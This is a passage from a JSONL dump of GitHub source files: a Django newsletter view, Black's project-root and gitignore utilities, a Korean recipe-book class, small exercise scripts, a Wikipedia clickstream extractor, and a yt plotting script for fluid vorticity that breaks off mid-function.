').format(request.build_absolute_uri(host),\n sub.email,\n sub.conf_num))\n try:\n sg = SendGridAPIClient(os.environ.get('SENDGRID_API_KEY'))\n response = sg.send(message)\n print(response.status_code)\n print(response.body)\n print(response.headers)\n except Exception as e:\n print(e)\n\n return redirect('profile')\n\n\n else:\n form = MailMessageForm()\n context = {\n 'form' : form,\n }\n\n return render(request,'newsletter/runletter.html', context)\n\nclass UserNewsletterView (AdminStaffRequiredMixin, ListView):\n model=NewsletterUser\n template_name = 'newsletter/newsletter_user_list.html'\n \n\n","repo_name":"Klewiu/joyful_bees","sub_path":"src/apps/newsletter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5226,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"70020911665","text":"import io\nimport os\nimport sys\nfrom functools import lru_cache\nfrom pathlib import Path\nfrom typing import (\n TYPE_CHECKING,\n Any,\n Dict,\n Iterable,\n Iterator,\n List,\n Optional,\n Pattern,\n Sequence,\n Tuple,\n Union,\n)\n\nfrom mypy_extensions import mypyc_attr\nfrom packaging.specifiers import InvalidSpecifier, Specifier, SpecifierSet\nfrom packaging.version import InvalidVersion, Version\nfrom pathspec import PathSpec\nfrom pathspec.patterns.gitwildmatch import GitWildMatchPatternError\n\nif sys.version_info >= (3, 11):\n try:\n import tomllib\n except ImportError:\n # Help users on older alphas\n if not TYPE_CHECKING:\n import tomli as tomllib\nelse:\n import tomli as tomllib\n\nfrom black.handle_ipynb_magics import jupyter_dependencies_are_installed\nfrom black.mode import TargetVersion\nfrom black.output import err\nfrom black.report import Report\n\nif TYPE_CHECKING:\n import colorama # noqa: F401\n\n\n@lru_cache\ndef find_project_root(\n srcs: Sequence[str], stdin_filename: Optional[str] = None\n) -> Tuple[Path, str]:\n \"\"\"Return a directory containing .git, .hg, or pyproject.toml.\n\n That directory will be a common parent of all files and directories\n passed in `srcs`.\n\n If no directory in the tree contains a marker that would specify it's the\n project root, the root of the file system is returned.\n\n Returns a two-tuple with the first element as the project root path and\n the second element as a string describing the method by which the\n project root was discovered.\n \"\"\"\n if stdin_filename is not None:\n srcs = tuple(stdin_filename if s == \"-\" else s for s in srcs)\n if not srcs:\n srcs = [str(Path.cwd().resolve())]\n\n path_srcs = [Path(Path.cwd(), src).resolve() for src in srcs]\n\n # A list of lists of parents for each 'src'. 
'src' is included as a\n # \"parent\" of itself if it is a directory\n src_parents = [\n list(path.parents) + ([path] if path.is_dir() else []) for path in path_srcs\n ]\n\n common_base = max(\n set.intersection(*(set(parents) for parents in src_parents)),\n key=lambda path: path.parts,\n )\n\n for directory in (common_base, *common_base.parents):\n if (directory / \".git\").exists():\n return directory, \".git directory\"\n\n if (directory / \".hg\").is_dir():\n return directory, \".hg directory\"\n\n if (directory / \"pyproject.toml\").is_file():\n return directory, \"pyproject.toml\"\n\n return directory, \"file system root\"\n\n\ndef find_pyproject_toml(\n path_search_start: Tuple[str, ...], stdin_filename: Optional[str] = None\n) -> Optional[str]:\n \"\"\"Find the absolute filepath to a pyproject.toml if it exists\"\"\"\n path_project_root, _ = find_project_root(path_search_start, stdin_filename)\n path_pyproject_toml = path_project_root / \"pyproject.toml\"\n if path_pyproject_toml.is_file():\n return str(path_pyproject_toml)\n\n try:\n path_user_pyproject_toml = find_user_pyproject_toml()\n return (\n str(path_user_pyproject_toml)\n if path_user_pyproject_toml.is_file()\n else None\n )\n except (PermissionError, RuntimeError) as e:\n # We do not have access to the user-level config directory, so ignore it.\n err(f\"Ignoring user configuration directory due to {e!r}\")\n return None\n\n\n@mypyc_attr(patchable=True)\ndef parse_pyproject_toml(path_config: str) -> Dict[str, Any]:\n \"\"\"Parse a pyproject toml file, pulling out relevant parts for Black.\n\n If parsing fails, will raise a tomllib.TOMLDecodeError.\n \"\"\"\n with open(path_config, \"rb\") as f:\n pyproject_toml = tomllib.load(f)\n config: Dict[str, Any] = pyproject_toml.get(\"tool\", {}).get(\"black\", {})\n config = {k.replace(\"--\", \"\").replace(\"-\", \"_\"): v for k, v in config.items()}\n\n if \"target_version\" not in config:\n inferred_target_version = infer_target_version(pyproject_toml)\n if inferred_target_version is not None:\n config[\"target_version\"] = [v.name.lower() for v in inferred_target_version]\n\n return config\n\n\ndef infer_target_version(\n pyproject_toml: Dict[str, Any]\n) -> Optional[List[TargetVersion]]:\n \"\"\"Infer Black's target version from the project metadata in pyproject.toml.\n\n Supports the PyPA standard format (PEP 621):\n https://packaging.python.org/en/latest/specifications/declaring-project-metadata/#requires-python\n\n If the target version cannot be inferred, returns None.\n \"\"\"\n project_metadata = pyproject_toml.get(\"project\", {})\n requires_python = project_metadata.get(\"requires-python\", None)\n if requires_python is not None:\n try:\n return parse_req_python_version(requires_python)\n except InvalidVersion:\n pass\n try:\n return parse_req_python_specifier(requires_python)\n except (InvalidSpecifier, InvalidVersion):\n pass\n\n return None\n\n\ndef parse_req_python_version(requires_python: str) -> Optional[List[TargetVersion]]:\n \"\"\"Parse a version string (i.e. 
``\"3.7\"``) to a list of TargetVersion.\n\n If parsing fails, will raise a packaging.version.InvalidVersion error.\n If the parsed version cannot be mapped to a valid TargetVersion, returns None.\n \"\"\"\n version = Version(requires_python)\n if version.release[0] != 3:\n return None\n try:\n return [TargetVersion(version.release[1])]\n except (IndexError, ValueError):\n return None\n\n\ndef parse_req_python_specifier(requires_python: str) -> Optional[List[TargetVersion]]:\n \"\"\"Parse a specifier string (i.e. ``\">=3.7,<3.10\"``) to a list of TargetVersion.\n\n If parsing fails, will raise a packaging.specifiers.InvalidSpecifier error.\n If the parsed specifier cannot be mapped to a valid TargetVersion, returns None.\n \"\"\"\n specifier_set = strip_specifier_set(SpecifierSet(requires_python))\n if not specifier_set:\n return None\n\n target_version_map = {f\"3.{v.value}\": v for v in TargetVersion}\n compatible_versions: List[str] = list(specifier_set.filter(target_version_map))\n if compatible_versions:\n return [target_version_map[v] for v in compatible_versions]\n return None\n\n\ndef strip_specifier_set(specifier_set: SpecifierSet) -> SpecifierSet:\n \"\"\"Strip minor versions for some specifiers in the specifier set.\n\n For background on version specifiers, see PEP 440:\n https://peps.python.org/pep-0440/#version-specifiers\n \"\"\"\n specifiers = []\n for s in specifier_set:\n if \"*\" in str(s):\n specifiers.append(s)\n elif s.operator in [\"~=\", \"==\", \">=\", \"===\"]:\n version = Version(s.version)\n stripped = Specifier(f\"{s.operator}{version.major}.{version.minor}\")\n specifiers.append(stripped)\n elif s.operator == \">\":\n version = Version(s.version)\n if len(version.release) > 2:\n s = Specifier(f\">={version.major}.{version.minor}\")\n specifiers.append(s)\n else:\n specifiers.append(s)\n\n return SpecifierSet(\",\".join(str(s) for s in specifiers))\n\n\n@lru_cache\ndef find_user_pyproject_toml() -> Path:\n r\"\"\"Return the path to the top-level user configuration for black.\n\n This looks for ~\\.black on Windows and ~/.config/black on Linux and other\n Unix systems.\n\n May raise:\n - RuntimeError: if the current user has no homedir\n - PermissionError: if the current process cannot access the user's homedir\n \"\"\"\n if sys.platform == \"win32\":\n # Windows\n user_config_path = Path.home() / \".black\"\n else:\n config_root = os.environ.get(\"XDG_CONFIG_HOME\", \"~/.config\")\n user_config_path = Path(config_root).expanduser() / \"black\"\n return user_config_path.resolve()\n\n\n@lru_cache\ndef get_gitignore(root: Path) -> PathSpec:\n \"\"\"Return a PathSpec matching gitignore content if present.\"\"\"\n gitignore = root / \".gitignore\"\n lines: List[str] = []\n if gitignore.is_file():\n with gitignore.open(encoding=\"utf-8\") as gf:\n lines = gf.readlines()\n try:\n return PathSpec.from_lines(\"gitwildmatch\", lines)\n except GitWildMatchPatternError as e:\n err(f\"Could not parse {gitignore}: {e}\")\n raise\n\n\ndef normalize_path_maybe_ignore(\n path: Path,\n root: Path,\n report: Optional[Report] = None,\n) -> Optional[str]:\n \"\"\"Normalize `path`. 
May return `None` if `path` was ignored.\n\n `report` is where \"path ignored\" output goes.\n \"\"\"\n try:\n abspath = path if path.is_absolute() else Path.cwd() / path\n normalized_path = abspath.resolve()\n try:\n root_relative_path = normalized_path.relative_to(root).as_posix()\n except ValueError:\n if report:\n report.path_ignored(\n path, f\"is a symbolic link that points outside {root}\"\n )\n return None\n\n except OSError as e:\n if report:\n report.path_ignored(path, f\"cannot be read because {e}\")\n return None\n\n return root_relative_path\n\n\ndef _path_is_ignored(\n root_relative_path: str,\n root: Path,\n gitignore_dict: Dict[Path, PathSpec],\n report: Report,\n) -> bool:\n path = root / root_relative_path\n # Note that this logic is sensitive to the ordering of gitignore_dict. Callers must\n # ensure that gitignore_dict is ordered from least specific to most specific.\n for gitignore_path, pattern in gitignore_dict.items():\n try:\n relative_path = path.relative_to(gitignore_path).as_posix()\n except ValueError:\n break\n if pattern.match_file(relative_path):\n report.path_ignored(\n path.relative_to(root), \"matches a .gitignore file content\"\n )\n return True\n return False\n\n\ndef path_is_excluded(\n normalized_path: str,\n pattern: Optional[Pattern[str]],\n) -> bool:\n match = pattern.search(normalized_path) if pattern else None\n return bool(match and match.group(0))\n\n\ndef gen_python_files(\n paths: Iterable[Path],\n root: Path,\n include: Pattern[str],\n exclude: Pattern[str],\n extend_exclude: Optional[Pattern[str]],\n force_exclude: Optional[Pattern[str]],\n report: Report,\n gitignore_dict: Optional[Dict[Path, PathSpec]],\n *,\n verbose: bool,\n quiet: bool,\n) -> Iterator[Path]:\n \"\"\"Generate all files under `path` whose paths are not excluded by the\n `exclude_regex`, `extend_exclude`, or `force_exclude` regexes,\n but are included by the `include` regex.\n\n Symbolic links pointing outside of the `root` directory are ignored.\n\n `report` is where output about exclusions goes.\n \"\"\"\n\n assert root.is_absolute(), f\"INTERNAL ERROR: `root` must be absolute but is {root}\"\n for child in paths:\n root_relative_path = child.absolute().relative_to(root).as_posix()\n\n # First ignore files matching .gitignore, if passed\n if gitignore_dict and _path_is_ignored(\n root_relative_path, root, gitignore_dict, report\n ):\n continue\n\n # Then ignore with `--exclude` `--extend-exclude` and `--force-exclude` options.\n root_relative_path = \"/\" + root_relative_path\n if child.is_dir():\n root_relative_path += \"/\"\n\n if path_is_excluded(root_relative_path, exclude):\n report.path_ignored(child, \"matches the --exclude regular expression\")\n continue\n\n if path_is_excluded(root_relative_path, extend_exclude):\n report.path_ignored(\n child, \"matches the --extend-exclude regular expression\"\n )\n continue\n\n if path_is_excluded(root_relative_path, force_exclude):\n report.path_ignored(child, \"matches the --force-exclude regular expression\")\n continue\n\n normalized_path = normalize_path_maybe_ignore(child, root, report)\n if normalized_path is None:\n continue\n\n if child.is_dir():\n # If gitignore is None, gitignore usage is disabled, while a Falsey\n # gitignore is when the directory doesn't have a .gitignore file.\n if gitignore_dict is not None:\n new_gitignore_dict = {\n **gitignore_dict,\n root / child: get_gitignore(child),\n }\n else:\n new_gitignore_dict = None\n yield from gen_python_files(\n child.iterdir(),\n root,\n include,\n exclude,\n 
extend_exclude,\n force_exclude,\n report,\n new_gitignore_dict,\n verbose=verbose,\n quiet=quiet,\n )\n\n elif child.is_file():\n if child.suffix == \".ipynb\" and not jupyter_dependencies_are_installed(\n warn=verbose or not quiet\n ):\n continue\n include_match = include.search(root_relative_path) if include else True\n if include_match:\n yield child\n\n\ndef wrap_stream_for_windows(\n f: io.TextIOWrapper,\n) -> Union[io.TextIOWrapper, \"colorama.AnsiToWin32\"]:\n \"\"\"\n Wrap stream with colorama's wrap_stream so colors are shown on Windows.\n\n If `colorama` is unavailable, the original stream is returned unmodified.\n Otherwise, the `wrap_stream()` function determines whether the stream needs\n to be wrapped for a Windows environment and will accordingly either return\n an `AnsiToWin32` wrapper or the original stream.\n \"\"\"\n try:\n from colorama.initialise import wrap_stream\n except ImportError:\n return f\n else:\n # Set `strip=False` to avoid needing to modify test_express_diff_with_color.\n return wrap_stream(f, convert=None, strip=False, autoreset=False, wrap=True)\n","repo_name":"psf/black","sub_path":"src/black/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":13928,"program_lang":"python","lang":"en","doc_type":"code","stars":35485,"dataset":"github-code","pt":"91"}
+{"seq_id":"74527546862","text":"from Recipe import Recipe\n\nclass RecipeBook:\n def __init__(self):\n self.recipe_list = []\n self.init_recipe()\n\n def add_recipe(self):\n # 추가할 레시피 이름 입력\n name = input('레시피의 이름을 입력하세요 : ')\n\n # 중복 체크\n for recipe in self.recipe_list:\n if name == recipe.name: # 중복되는 레시피가 있으면 중복이라고 표기\n print('이미 존재하는 레시피입니다.')\n return # 빠져 나오기\n\n # 중복되는 레시피가 없으면 추가\n # 레시피 생성\n new_recipe = Recipe(name)\n new_recipe.set_recipe()\n\n # 레시피 리스트에 생성한 레시피 추가하기\n self.recipe_list.append(new_recipe)\n\n def show_recipe(self):\n for index, recipe in enumerate(self.recipe_list):\n print(f'{index + 1}')\n print(recipe)\n\n def search_recipe(self):\n # 찾은 레시피\n searched_recipe = []\n\n # 레시피 이름 입력받기\n name = input('원하는 레시피를 검색하세요 : ')\n\n # 레시피의 이름이 검색한 이름과 같은지 확인\n for recipe in self.recipe_list:\n if name == recipe.name: # 같으면 레시피 보여주기\n print(recipe)\n searched_recipe.append(recipe)\n\n if len(searched_recipe) == 0: # 검색한 레시피가 없으면\n # 추가할지 물어보기\n answer = input('찾는 레시피가 없습니다. 레시피를 추가하시겠습니까? 1 : yes, 1 이외의 숫자 : no')\n\n if answer == 1: # 1을 입력했을 때\n # 레시피 추가하기\n self.add_recipe()\n else: # 1이 아닌 다른 숫자를 입력했을 때\n return\n\n # 재료로 메뉴 검색하기\n def search_ingrediant(self):\n # 빈 set 생성\n all_ingrediant = set()\n\n # 레시피북의 레시피 재료 set에 넣기\n for recipe in self.recipe_list:\n for ingrediant in recipe.ingrediant:\n all_ingrediant.add(ingrediant)\n\n # 모든 재료 보여주기\n for index, ingrediant in enumerate(all_ingrediant):\n print(f'{index + 1}, {ingrediant}')\n\n # 찾을 재료 이름 검색하기\n search_num = int(input('사용할 재료를 입력하세요 : '))\n search_ingrediant = list(all_ingrediant)[search_num-1]\n\n # 입력한 재료가 포함되�� 레시피 모두 보여주기\n for recipe in self.recipe_list:\n # 입력한 재료가 포함되면\n if search_ingrediant in recipe.ingrediant:\n # 레시피 모두 보여주기\n print(recipe)\n \n def init_recipe(self):\n 떡볶이 = Recipe('떡볶이')\n 떡볶이.people = 2 # 1\n 떡볶이.video = 'youtube.com' # ''\n 떡볶이.ingrediant = {'물': '100', '떡': '100', '고추장': '100'} # {}\n \n self.recipe_list.append(떡볶이)\n\n 카레 = Recipe('카레')\n 카레.ingrediant = {'카레가루': '150', '감자': '100', '당근': '100'}\n\n self.recipe_list.append(카레)\n \n 파스타 = Recipe('파스타')\n 파스타.contents = '맛있게 만드세요!'\n 파스타.ingrediant = {'면': '100', '소스': '200'}\n\n self.recipe_list.append(파스타)\n\n def __str__(self):\n pass","repo_name":"Endel04/pythonProject","sub_path":"Class/Recipebook.py","file_name":"Recipebook.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"2640000736","text":"import time\n\ndef is_trio(a, b, c):\n if a**2 + b**2 == c**2 and a < b and b < c:\n return True\n return False\nstart = time.time()\nflag = False\nfor a in range(1, 1000):\n for b in range(a, 1000):\n for c in range(b, 1000):\n if is_trio(a, b, c) and a + b + c == 1000:\n print(a, b, c)\n flag = True\n break\n if flag:\n break\n if flag:\n break\nprint(time.time() - start)\n","repo_name":"ostapkob/Euler","sub_path":"Python/p009.py","file_name":"p009.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"25641806148","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 10 22:57:30 2023\n\n@author: yesenia\n\"\"\"\nres = \"\"\nn = int (input())\nfor i in range(1 , n +1):\n if i % 2 == 0:\n res += str(i) + \" \"\n \nif len(res)== 0:\n print(\"Nada que imprimir\")\nelse:\n print(res)\n \n ","repo_name":"yesenia0490/practica_python","sub_path":"omegaup_pares.py","file_name":"omegaup_pares.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"3654779024","text":"import os\nimport gzip\nimport pickle\nimport argparse\nfrom collections import defaultdict\n\n\nparser = argparse.ArgumentParser(description='Process graphs.')\nparser.add_argument('--lang', type=str, help='topic name')\n\nargs = parser.parse_args()\n\nlang = args.lang\nfolder = 'data/dumps/clickstreams/'\nlist_files = [f for f in os.listdir(folder) if f.startswith('clickstream-{}wiki'.format(lang))]\n\ndata_files = [folder+f for f in list_files]\nprint(data_files[0])\ntitle_id = {}\nwith open('data/wikipedia_all/' + 'id_title.txt', 'r') as f:\n for l in f:\n idx, title = l.split('\\t')\n \n title_id[title.strip()] = idx\nprint('Dictionary of title and respective ids has been loaded.')\n\n\nclickstream_dictionary = defaultdict(int)\nentrance_dictionary = defaultdict(int)\n#monthly_click = {}\nmonthly_entrance = {}\n\nfor raw_click in data_files:\n print(raw_click)\n date = '_'.join(raw_click.split('.')[0].split('-')[-2:])\n #monthly_click[date] = {}\n monthly_entrance[date] = {}\n with gzip.open(raw_click,'rt') as f:\n for line in f:\n title_out, title_in, kind, clicks = line.split('\\t')\n # decode titles\n try:\n #if kind == 'internal':\n out = title_id[title_out]#.lower()] \n in_ = title_id[title_in.strip()]#.lower()]\n clickstream_dictionary[(out, in_)] += int(clicks.strip())\n #monthly_click[date][(out, in_)] = int(clicks.strip())\n except KeyError:\n try:\n #if kind=='external':\n in_ = title_id[title_in.strip()]#.lower()]\n entrance_dictionary[in_] += int(clicks.strip())\n monthly_entrance[date][in_] = int(clicks.strip())\n except:\n continue\n continue\n\n #with open('data/wikipedia_all/' + lang + '_' + str(date) + '_monthly_click' + '.p', 'wb') as f:\n # pickle.dump(monthly_click, f)\nwith open('data/wikipedia_all/' + lang + '_clickstreams' + '.p', 'wb') as f:\n pickle.dump(clickstream_dictionary, f)\n\nwith open('data/wikipedia_all/' + lang + '_enter_external' + '.p', 'wb') as f:\n pickle.dump(entrance_dictionary, f)\n\nwith open('data/wikipedia_all/' + lang + '_monthly_entrance' + '.p', 'wb') as f:\n pickle.dump(monthly_entrance, f)\n\n","repo_name":"CriMenghini/WikiNetBias","sub_path":"code/clickstream_extraction.py","file_name":"clickstream_extraction.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"14036029631","text":"import yt\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom math import log\r\n\r\ndef olr(a): #outlier range for CB labelling\r\n\tq1 = np.percentile(a,25)\r\n\tq3 = np.percentile(a,75)\r\n\tiqr = q3-q1\r\n\treturn([q1-1.5*iqr,q3+1.5*iqr])\r\n\r\ndef arrMin(nc):\r\n\ttry:\r\n\t\treturn(nc.min())\r\n\texcept:\r\n\t\treturn(min(nc))\r\n\r\ndef arrMax(nc):\r\n\ttry:\r\n\t\treturn(nc.max())\r\n\texcept:\r\n\t\treturn(max(nc))\r\n\r\ndef plot(nx,ny,nc,cbname,fname,text=\"\"):\r\n\t# print(\"{}.png loading\".format(fname))\r\n\tprint(\"{}: min = {} , max = {}\".format(fname, arrMin(nc), arrMax(nc)))\r\n\tplt.clf()\r\n\t# plt.scatter(nx, ny, c=nc, marker='o', edgecolor='none', vmin=-0.01, vmax=0.01)\r\n\r\n\t# Uses extrema cutoffs for CB range\r\n\tplt.scatter(nx, ny, c=nc, marker='o', edgecolor='none', vmin=arrMin(nc), vmax=arrMax(nc))\r\n\r\n\t# Uses outlier cutoffs for CB range\r\n\t# plt.scatter(nx, ny, c=nc, marker='o', edgecolor='none', vmin=olr(nc)[0], vmax=olr(nc)[1])\r\n\r\n\tplt.xlim(0,1)\r\n\tplt.ylim(-0.5,0.5)\r\n\tplt.gca().set_position((.1, .3, .8, .6))\r\n\r\n\tplt.xlabel('x (cm)', fontsize=18)\r\n\tplt.ylabel('y (cm)', fontsize=18)\r\n\tplt.title(fname, fontsize=18)\r\n\tcb = plt.colorbar()\r\n\tcb.set_label(cbname, fontsize=18)\r\n\tplt.gcf().set_size_inches(12,10)\r\n\r\n\tplt.figtext(.02,.02,text)\r\n\r\n\tplt.savefig(\"{}.png\".format(fname)) #Uncomment to save image\r\n\t# plt.show() #Uncomment to show image\r\n\r\ndef quiverPlot(nx,ny,nc,cbname,fname,text=\"\"):\r\n\tX, Y = nx, ny\r\n\tU = nc[0]\r\n\tV = nc[1]\r\n\r\n\tplt.clf()\r\n\r\n\t# plt.figure()\r\n\t# plt.title('Arrows scale with plot width, not view')\r\n\t# Q = plt.quiver(nx, ny, U, V, units='width')\r\n\t# qk = plt.quiverkey(Q, 0.9, 0.9, 2, r'$2 \\frac{m}{s}$', labelpos='E',\r\n\t# coordinates='figure')\r\n\r\n\tplt.figure()\r\n\tplt.title(fname)\r\n\tk = 5\r\n\tQ = plt.quiver(X[::k, ::k], Y[::k, ::k], U[::k, ::k], V[::k, ::k], np.hypot(U, V),\r\n\t pivot='tip')\r\n\tqk = plt.quiverkey(Q, 0.9, 0.9, 1, r'$1 \\frac{m}{s}$', labelpos='E',\r\n\t coordinates='figure')\r\n\tplt.scatter(X[::k, ::k], Y[::k, ::k], color='r', s=1)\r\n\r\n\t# plt.figure()\r\n\t# plt.title(\"pivot='tip'; scales with x view\")\r\n\t# M = np.hypot(U, V)\r\n\t# Q = plt.quiver(X, Y, U, V, M, units='x', pivot='tip', width=0.001,\r\n\t# scale=1 / 0.15)\r\n\t# plt.scatter(X, Y, color='k', s=1)\t\r\n\r\n\tplt.savefig(\"{}.png\".format(fname))\r\n\r\n# Replaced with numpy array subtraction\r\ndef diff(a,b): #Returns difference between datasets\r\n\treturn([a[i] - b[i] for i in range(min(len(a),len(b)))])\r\n\r\ndef diffstats(ndiff):\r\n\t# Find relevant stats from ndiff\r\n\t# min = ndiff[0]\r\n\t# max = ndiff[0]\r\n\t# absmin = abs(ndiff[0])\r\n\tabsmax = abs(float(ndiff[0][0]))\r\n\tRSS = 0\r\n\tfor row in ndiff:\r\n\t\tfor i in row:\r\n\t\t\t# if i < velymin:\r\n\t\t\t# \tvelymin = i\r\n\t\t\t# if i > velymax:\r\n\t\t\t# \tvelymax = i\r\n\t\t\t# if abs(i) < velyabsmin:\r\n\t\t\t# \tvelyabsmin = abs(i)\r\n\t\t\tif abs(float(i)) > absmax:\r\n\t\t\t\tabsmax = abs(float(i))\r\n\r\n\t\t\tRSS += float(i)**2\r\n\r\n\treturn({\"absmax\" : absmax, \"absmaxr\" : round(absmax,5), \"RSS\" : RSS, \"RSSr\" : round(RSS,5)})\r\n\r\n# Arguments are two datasets; specified parameter of interest; verbose parameter; color bar label; file name\r\ndef diffAnalysis(ds0, ds1, poi, poiv, cbname, fname):\r\n\t# ad0 = ds0.all_data()\r\n\t# ad1 = ds1.all_data()\r\n\tad0 = ds0.covering_grid(level=0, 
left_edge=ds0.index.grids[0].LeftEdge, dims=ds0.domain_dimensions)\r\n\tad1 = ds1.covering_grid(level=0, left_edge=ds1.index.grids[0].LeftEdge, dims=ds1.domain_dimensions)\r\n\t\r\n\t# Retrive relevant data from grid: x, y, vely\r\n\tnx = [np.array(ad0[\"x\"]), np.array(ad1[\"x\"])]\r\n\tny = [np.array(ad0[\"y\"]), np.array(ad1[\"y\"])]\r\n\t\r\n\tnpoi = [np.array(ad0[poi]), np.array(ad1[poi])]\r\n\t# ndiff = diff(npoi[0],npoi[1])\r\n\tndiff = npoi[0]-npoi[1]\r\n\r\n\tstats = diffstats(ndiff)\r\n\tstatsv = \"Greatest Absolute Difference in {} = {}\" \\\r\n\t\t\"\\nSum of Squared Residuals (Measure of total discrepancy) = {}\" \\\r\n\t\t.format(poiv,stats[\"absmaxr\"],stats[\"RSSr\"])\r\n\r\n\t# plot(nx[0],ny[0],cbvely,nvely[0],\"khv0\") Uncomment asap\r\n\t# plot(nx[1],ny[1],cbvely,nvely[1],\"khv1\")\r\n\tplot(nx[0],ny[0],ndiff,cbname,fname,statsv)\r\n\r\n# Arguments are a dataset; specified parameter of interest; verbose parameter; color bar label; file name\r\ndef visualize(ds, poi, poiv, cbname, fname):\r\n\t# ad = ds.all_data()\r\n\tad = ds.covering_grid(level=0, left_edge=ds.index.grids[0].LeftEdge, dims=ds.domain_dimensions)\r\n\r\n\t# Retrive relevant data from grid: x, y, vely\r\n\tnx = np.array(ad[\"x\"])\r\n\tny = np.array(ad[\"y\"])\r\n\t\r\n\tnpoi = np.array(ad[poi])\r\n\r\n\tplot(nx,ny,npoi,cbname,fname)\r\n\r\n# Arguments are two datasets; specified field of interest; verbose field; color bar label; file name\r\ndef fieldAnalysis(ds, foi, foiv, cbname, fname):\r\n\tad = ds.covering_grid(level=0, left_edge=ds.index.grids[0].LeftEdge, dims=ds.domain_dimensions)\r\n\r\n\tx = np.array(ad[\"x\"])\r\n\ty = np.array(ad[\"y\"])\r\n\r\n\tplot(x,y,foi(ad),cbname,fname)\r\n\r\ndef fieldAnalysisQuiver(ds, foi, foiv, cbname, fname):\r\n\tad = ds.covering_grid(level=0, left_edge=ds.index.grids[0].LeftEdge, dims=ds.domain_dimensions)\r\n\r\n\tx = np.array(ad[\"x\"])\r\n\ty = np.array(ad[\"y\"])\r\n\r\n\tquiverPlot(x,y,foi(ad),cbname,fname)\r\n\r\ndef vorticity(ad):\r\n\tx = np.array(ad[\"x\"])\r\n\ty = np.array(ad[\"y\"])\r\n\thx = float(x[1,0]-x[0,0])\r\n\thy = float(y[0,1]-y[0,0])\r\n\r\n\tvelx = np.array(ad[\"velx\"])\r\n\tvely = np.array(ad[\"vely\"])\r\n\t\r\n\t# dvelydx = np.zeros((len(x),len(x[0])))\r\n\t# dvelxdy = np.zeros((len(x),len(x[0])))\r\n\tdvelydx = finiteDiffX(x, y, vely)\r\n\tdvelxdy = finiteDiffY(x, y, velx)\r\n\tvort = np.zeros((len(x),len(x[0])))\r\n\r\n\t# Finite differences used; with accuracy 2\r\n\tfor i in range(len(x)):\r\n\t\tfor j in range(len(x[i])):\r\n\t\t\t# Calculates vorticity\r\n\t\t\t# vort[i,j] = dvelydx[i,j] - dvelxdy[i,j]\r\n\r\n\t\t\t# Absolute Value\r\n\t\t\t# vort[i,j] = abs(dvelydx[i,j] - dvelxdy[i,j])\r\n\r\n\t\t\t# Log Scale\r\n\t\t\tvort[i,j] = log(abs(dvelydx[i,j] - dvelxdy[i,j]))\r\n\r\n\t\t\t# Log Scale\r\n\t\t\t# vort[i,j] = log(abs(dvelydx[i,j]))\r\n\r\n\treturn(vort)\r\n\r\ndef gradient(ad):\r\n\tx = np.array(ad[\"x\"])\r\n\ty = np.array(ad[\"y\"])\r\n\thx = float(x[1,0]-x[0,0])\r\n\thy = float(y[0,1]-y[0,0])\r\n\r\n\tvelx = np.array(ad[\"velx\"])\r\n\tvely = np.array(ad[\"vely\"])\r\n\t\r\n\t# dvelydx = np.zeros((len(x),len(x[0])))\r\n\t# dvelxdy = np.zeros((len(x),len(x[0])))\r\n\tdvelxdx = finiteDiffX(x, y, velx)\r\n\tdvelydy = finiteDiffY(x, y, vely)\r\n\tgradMag = np.zeros((len(x),len(x[0])))\r\n\r\n\t# Finite differences used; with accuracy 2\r\n\tfor i in range(len(x)):\r\n\t\tfor j in range(len(x[i])):\r\n\t\t\t# Calculates vorticity\r\n\t\t\t# grad[i,j] = [dvelxdx[i,j], dvelydy[i,j]]\r\n\r\n\t\t\t# Magnitude\r\n\t\t\t# grad[i,j] 
= (dvelxdx[i,j]**2 + dvelydy[i,j]**2)**(0.5)\r\n\r\n\t\t\t# Log Scale\r\n\t\t\tgradMag[i,j] = log((dvelxdx[i,j]**2 + dvelydy[i,j]**2)**(0.5))\r\n\r\n\t# return(gradMag)\r\n\treturn(dvelxdx, dvelydy)\r\n\r\ndef finiteDiffX(ax, ay, ac):\r\n\tx = np.array(ax)\r\n\ty = np.array(ay)\r\n\tc = np.array(ac)\r\n\tdc = np.zeros((len(x),len(x[0])))\r\n\r\n\thx = float(x[1,0]-x[0,0])\r\n\r\n\t# Finite differences used; with accuracy 2\r\n\tfor i in range(len(x)):\r\n\t\tfor j in range(len(x[i])):\r\n\t\t\tif i > 0 and i < len(x)-1:\r\n\t\t\t\t# centered difference in the interior\r\n\t\t\t\tdc[i,j] = (-0.5*c[i-1,j] + 0.5*c[i+1,j])/hx\r\n\t\t\telse:\r\n\t\t\t\tif i == 0:\r\n\t\t\t\t\t# second-order forward difference at the lower boundary\r\n\t\t\t\t\tdc[i,j] = (-1.5*c[i,j] + 2*c[i+1,j] - 0.5*c[i+2,j])/hx\r\n\t\t\t\tif i == len(x)-1:\r\n\t\t\t\t\t# second-order backward difference: (3c[i] - 4c[i-1] + c[i-2])/(2h); the c[i-2] coefficient is 0.5, not 1.5\r\n\t\t\t\t\tdc[i,j] = (0.5*c[i-2,j] - 2*c[i-1,j] + 1.5*c[i,j])/hx\r\n\r\n\treturn(dc)\r\n\r\ndef finiteDiffY(ax, ay, ac):\r\n\tx = np.array(ax)\r\n\ty = np.array(ay)\r\n\tc = np.array(ac)\r\n\tdc = np.zeros((len(x),len(x[0])))\r\n\r\n\thy = float(y[0,1]-y[0,0])\r\n\r\n\t# Finite differences used; with accuracy 2\r\n\tfor i in range(len(x)):\r\n\t\tfor j in range(len(x[i])):\r\n\t\t\t# the j bounds must use the column count len(x[i]), not the row count len(y)\r\n\t\t\tif j > 0 and j < len(x[i])-1:\r\n\t\t\t\tdc[i,j] = (-0.5*c[i,j-1] + 